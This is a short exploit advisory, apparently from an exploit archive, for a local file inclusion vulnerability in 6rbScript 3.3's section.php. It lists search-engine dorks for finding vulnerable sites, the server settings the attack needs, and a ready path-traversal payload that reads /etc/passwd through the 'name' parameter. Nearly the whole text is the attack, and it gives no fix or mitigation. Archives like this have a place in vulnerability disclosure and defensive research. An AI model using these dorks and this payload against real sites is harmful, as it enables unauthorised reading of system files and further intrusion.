id: 3715
date: 09/20/2008
title: 6rbScript 3.3 (section.php name) Local File Inclusion Vulnerability
author: Stack
cves: 

===================================================================
6rbScript 3.3 (section.php name) Local File Inclusion Vulnerability
===================================================================


|___________________________________________________|
|
| 6rbScript V3.3 Local file Vulnerability
|
|___________________________________________________
|                                                   |
|
| script : www.6rbscript.com
|
| DorK   : inurl:"section.php?name=singers"
| dorK   : Powered By 6rbScript V3.3
|___________________________________________________|
 
Author : Stack
 
Expl need magic quote = off & open basdir = off in many server
 
site.il/section.php?name=../../../../etc/passwd



#  0day.today [2023-03-27]  #